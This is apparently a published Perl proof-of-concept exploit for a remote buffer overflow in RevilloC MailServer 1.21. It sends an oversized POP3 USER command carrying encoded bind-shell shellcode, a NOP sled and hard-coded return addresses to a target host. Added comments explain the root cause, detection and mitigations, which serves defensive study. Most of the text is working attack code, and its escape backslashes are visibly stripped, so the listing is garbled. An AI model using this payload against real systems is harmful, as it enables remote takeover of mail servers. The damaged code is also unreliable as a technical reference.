# Title : RevilloC MailServer 1.21 (USER) Remote Buffer Overflow Exploit PoC
# Published : 2006-03-07
# Author : securma massine
#!/usr/bin/perl -w
#revilloC mail server PoC exploit ( for xp sp1)
# Discovered securma massine from MorX Security Research Team (http://www.morx.org).
#RevilloC is a MailServer and Proxy v 1.21 (http://www.revilloC.com)
#The mail server is a central point for emails coming in and going out from home or office
#The service will work with any standard email client that supports POP3 and SMTP.
#by sending a large buffer after USER commands
#C:>nc 127.0.0.1 110
#+OK RevilloC POP3 Ready
#USER "A" x4081 + "xff"x4 + "xdd"x4 + "x0dx0a" (xp sp2)
#we have:
#access violation when reading [dddddddd].
#ntdll!wcsncat+0x387:
#7C92B3FB 8B0B MOV ECX,DWORD PTR DS:[EBX] --->EBX points to "xdd"x4
#ECX dddddddd
#EAX FFFFFFFF
#Vendor contacted 14/01/2006 , No response,No patch.
#this entire document is for educational, testing and demonstration purposes only.
#greets all MorX members,undisputed,sara
#!/usr/bin/perl -w
use IO::Socket;
# Exactly one command-line argument (the target host) is required; otherwise
# print a usage message and exit. The script runs with only -w and never
# enables `use strict`, so every variable below is an undeclared package
# global.
# NOTE(review): all string literals are reproduced exactly as published.
# Several of them appear to have lost escape backslashes in transcription,
# so this listing is not expected to run as written.
if ($#ARGV<0)
{
print "n write the target IP!! nn";
exit;
}
# Payload stage as published (opaque byte string, not analysed here). The
# status message at the end of the script says it opens a listener on TCP
# port 9191 -- a host that starts listening on 9191 immediately after a POP3
# session is a useful post-exploitation indicator for defenders.
$shellcode = "xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33".
"xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C".
"x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE".
"x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB".
"xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77".
"xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77".
"xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77".
"xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77".
"xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77".
"xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77".
"xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77".
"xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77".
"xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77".
"xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB".
"x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C".
"xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0".
"x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77".
"xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0".
"xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB".
"x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5".
"x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98".
"xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE".
"x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77".
"xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8".
"x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF".
"x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90".
"x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74".
"xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4".
"xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94".
"x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5".
"xD3x4Ax8Cx88";
# Filler that precedes the payload. 3601 repetitions plus the payload length
# presumably line up with the ~4081-byte offset named in the header comment
# -- TODO confirm against that comment.
$buffer = "x90"x3601;
# Hard-coded pointer values that land just past the overflowed buffer. They
# are tied to one exact OS build (the header names XP SP1/SP2), which is why
# address randomisation and non-executable stacks blunt this class of
# exploit.
$eax ="x83xb5x19x01"; # change if needed
$peb= "x20xf0xfdx7f"; #PEB lock
# POP3 USER command prefix and the CRLF line terminator.
$user ="USER ";
$enter = "x0dx0a";
# Plain TCP connection to the target's POP3 port (110); abort if it fails.
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"110"); unless ($connect) { die "cant connect" }
print "nRevilloC mail server remote PoC exploit by securma massinen";
print "nsecurma@morx.orgn";
print "n+++++++++++www.morx.org++++++++++++++++n";
# Read up to 128 bytes of the server greeting into the undeclared global
# $text and echo it; the content is not checked.
$connect->recv($text,128);
print "$textn";
print "[+] Sent USERn";
# Root cause: the server copies the USER argument into a fixed-size buffer
# without a length check (the header reports the fault inside
# ntdll!wcsncat). RFC 1939 caps each POP3 command argument at 40 characters;
# a server that enforces that bound before copying is not affected, and a
# USER line several kilobytes long carrying non-printable bytes is a trivial
# network-detection signature. Nothing is read back after the send, so this
# script cannot tell whether the request was accepted.
$connect->send($user . $buffer . $shellcode . $eax . $peb . $enter);
print "[+] Sent shellcode..telnet to victim host port 9191n";